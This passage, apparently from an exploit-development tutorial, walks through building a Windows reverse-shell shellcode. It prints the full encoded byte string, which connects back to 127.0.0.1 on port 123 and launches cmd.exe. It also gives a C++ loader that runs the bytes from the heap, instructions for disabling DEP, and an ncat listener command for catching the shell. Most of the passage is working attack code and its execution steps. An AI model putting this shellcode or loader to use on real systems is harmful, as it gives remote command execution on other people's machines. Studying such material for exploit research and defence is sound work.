"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

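The part about relocations is important, because it lets you check that everything is OK. For example, we know that our reverse shell uses 3 strings, and the output confirms that all 3 were extracted from the .rdata section. We can also see that the original shellcode is 614 bytes long and that the resulting shellcode (after handling relocations and null bytes) is 715 bytes long.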
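One extra sanity check is to recompute the reported length from the first bytes of the printed output. Those bytes look like a shorter decoder than the one listed earlier (a single missing byte, 0x05, and a LOOP instruction), but the MOV ECX / XOR ECX pair has the same role. The sketch below is my own reading of those bytes, not something the script prints, and the variable names are hypothetical.

```python
import struct

# First 21 bytes of the printed output: CALL $+4, INC EAX, POP EDI,
# MOV ECX imm32, XOR ECX imm32, ADD EDI imm8.
stub_head = bytes.fromhex("e8ffffffffc05f" "b9a8030101" "81f101010101" "83c71d")

# Check that the opcodes are where this reading assumes they are.
assert stub_head[7] == 0xB9                # MOV ECX, imm32
assert stub_head[12:14] == b"\x81\xf1"     # XOR ECX, imm32
assert stub_head[18:20] == b"\x83\xc7"     # ADD EDI, imm8

(xor1,) = struct.unpack_from("<I", stub_head, 8)
(xor2,) = struct.unpack_from("<I", stub_head, 14)

payload_len = xor1 ^ xor2          # value left in ECX: bytes to decode
here_offset = 5                    # "here" is the byte right after the CALL
decoder_len = here_offset + stub_head[20]   # ADD EDI, shellcode_begin - here

print(hex(xor1), hex(xor2), payload_len, decoder_len, decoder_len + payload_len)
```

Neither immediate contains a null byte, yet their XOR is 0x2A9 = 681. Adding the 34 bytes of decoder in front gives 715, which matches the "final shellcode length" line.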

Now we need to run the resulting shellcode. Here's the complete source code:

#include <cstring>
#include <cassert>

// Important: Disable DEP!
//  (Linker->Advanced->Data Execution Prevention = NO)

void main() {
    char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
        "\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
        "\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
        "\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
        "\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
        "\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
        "\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
        "\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
        "\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
        "\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
        "\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
        "\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
        "\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
        "\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
        "\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
        "\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
        "\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
        "\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
        "\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
        "\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
        "\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
        "\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
        "\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
        "\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
        "\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
        "\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
        "\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
        "\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
        "\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
        "\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
        "\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
        "\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
        "\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
        "\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73"
        "\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65"
        "\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05";

    static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");

    // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.
    char *ptr = new char[sizeof(shellcode)];
    memcpy(ptr, shellcode, sizeof(shellcode));
    ((void(*)())ptr)();
}

To make this code work, you need to turn off DEP (Data Execution Prevention): go to Project→<solution name> Properties and then, under Configuration Properties, Linker and Advanced, set Data Execution Prevention (DEP) to No (/NXCOMPAT:NO). This is needed because the shellcode is executed from the heap, and with DEP enabled the heap is not executable.

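static_assert was introduced with C++11 (so VS 2013 CTP is required) and is used here to check that you wrote

char shellcode[] = "..."

instead of

char *shellcode = "..."

In the first case, sizeof(shellcode) is the actual length of the shellcode (plus the terminating null byte of the string literal), and the shellcode is copied onto the stack. In the second case, sizeof(shellcode) is just the size of the pointer (i.e. 4 in a 32-bit build), and the pointer points to the shellcode in the .rdata section.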
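The same array-versus-pointer distinction can be observed from Python through ctypes, which exposes C-style sizes. This is only an analogy, assuming the standard ctypes module; the variable names are made up and the bytes are placeholders, not the shellcode.

```python
import ctypes

data = b"\x90\x90\xc3"  # placeholder bytes, not the real shellcode

# Like `char shellcode[] = "..."`: the buffer owns the bytes plus a trailing NUL.
array_like = ctypes.create_string_buffer(data)

# Like `char *shellcode = "..."`: only a pointer to bytes stored elsewhere.
pointer_like = ctypes.c_char_p(data)

print(ctypes.sizeof(array_like))    # len(data) + 1
print(ctypes.sizeof(pointer_like))  # pointer size of this Python build
```

On a 64-bit Python the second value is 8 rather than 4, which is also why the static_assert threshold of 4 in the C++ code is tied to a 32-bit build.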

To test the shellcode, open a cmd shell and enter

ncat -lvp 123 

Then run the shellcode and see whether it works.
